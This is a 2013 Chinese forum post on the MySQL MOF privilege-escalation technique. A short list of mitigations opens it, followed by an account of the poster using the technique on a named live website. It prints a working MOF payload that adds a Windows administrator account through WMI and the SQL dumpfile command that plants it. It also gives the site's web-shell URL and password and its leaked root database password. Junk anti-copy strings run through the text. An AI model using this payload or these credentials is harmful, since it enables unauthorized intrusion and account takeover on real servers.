Mysql mof扩展漏洞防范方法& q( ]% e" g5 z
. k) K; w0 F' _
网上公开的一些利用代码:
' ^7 b$ s- s9 @1 s7 o: j) {) i- z2 K4 M3 {7 _& }. P( I
#pragma namespace(“\\\\.\\root\\subscription”), k. U* i c/ l- W
0 q2 c% d0 Z) X' @instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
2 Y: L& {( q4 D/ p1 S1 ]- e2 O! _- _8 c6 z' ~, Z6 D
7 l3 N L* w$ y) l6 S# \% r3 N& ?! Z0 X v* q, s0 E
/ W* O3 f+ J6 s. p% i4 c
6 _3 f% R) C I3 g* r* C3 _/ ^. l7 L
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
# f1 @! F2 n/ B1 v2 q7 K从上面代码来看得出解决办法:1 Z1 T- e, P) @7 X
+ r! _3 O; b( w/ \2 ~" p1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数. Y& L8 U4 c9 H' j' t2 a2 \0 Y
4 x2 y* V% r6 G# @/ j9 R( k
2、禁止使用”WScript.Shel”组件# a" b4 b4 q: }! u9 e2 s9 u9 j
. {% ~, o* i$ q7 l1 _9 W) I8 }& U
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
7 r* \; T0 E9 c4 B6 C5 T% G* B, l0 o9 u o
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
: a6 @! t. ]; o! q2 c1 ?
" I9 v5 T8 ~6 B' {$ g! r事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
5 s6 c6 X) a- R6 o6 O. R4 j% t" Y5 P# S9 U
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
# H: f: s" l$ b; e# I/ ?6 W# j4 x& z6 E3 K
看懂了后就开始练手吧7 Z, v: N2 U0 i
( J9 Z& c( n+ _7 e4 w
http://www.webbmw.com/config/config_ucenter.php 一句话 a
" d; l' e( V9 E3 n& | w- q7 k; r/ j+ C0 C2 p
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
* Y: I3 \. m4 W. a0 W& ]
7 t5 t. i# e$ Q7 }; h于是直接用菜刀开搞
+ q3 S) H; x0 M- Z& R
1 U9 _. W! I' O) x上马先' z: K$ u7 Q5 b3 L$ x
% d1 q+ F9 I g既然有了那些账号 之类的 于是我们就执行吧…….
* ^# z2 y" f X
, T# Q$ @( Y* h小小的说下# _; A( h5 ~7 R s
9 A6 s, \1 w- P4 ~0 }% R9 {& X( J" Y# f在这里第1次执行未成功 原因未知% ?2 K# g8 L5 @: f
+ L( v2 h4 \+ a, D+ Q
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。4 `! H" z, R) p! F' d
- j$ E+ P+ J* H' J2 b#pragma namespace(“\\\\.\\root\\subscription”)# e( ?4 \( A$ h; e
+ _; w8 j. E! X, o, ?7 o" R3 U0 d
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };) [" C- M$ ^; e* p5 W( `
- z. G4 p: q; m5 {1 W8 q我是将文件放到C:\WINDOWS\temp\1.mof
* K* W6 R/ ?' M: N6 m7 V
1 @3 m0 U5 ]/ [7 {( \' b B$ l7 T/ t所以我们就改下执行的代码
% ~% d7 R/ b% q; A! T, r& m
# f, t: x; f7 J: ]select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;! t' J6 N+ A. B
( D7 e% `* C9 p: ~! r
F5 D' R5 w& o6 k) U* [: z0 b+ @- n+ E( }/ X, {; c1 L1 Y
但是 你会发现账号还是没有躺在那里。。
1 {3 l7 o# Z- g1 J4 e H' p
" U( v+ e3 w) e5 B# a于是我就感觉蛋疼
! z% l) V' \# O. N0 K
* J& n. N3 @' p% B* q$ h2 M就去一个一个去执行 但是执行到第2个 mysql时就成功了………
3 ~ U5 k Z u, { e9 u7 q' k+ K1 P6 I. b' r. D. D
. Z, k* u5 I' n a4 U
" f) {5 Q) t9 o. \& b3 I但是其他库均不成功…
3 O& s" n. P( M: J. H4 C8 g R0 Y3 `. X/ t& B8 F5 p
我就很费解呀 到底为什么不成功求大牛解答…3 n& O0 g3 s, r' f3 q* f5 a
3 T! g8 B$ P9 U8 H
: G3 c% s* o$ _+ A& N `
9 \# h2 i+ ~( r9 @$ c0 q+ L |
发表于 2013-1-4 19:49:49
收藏
支持
反对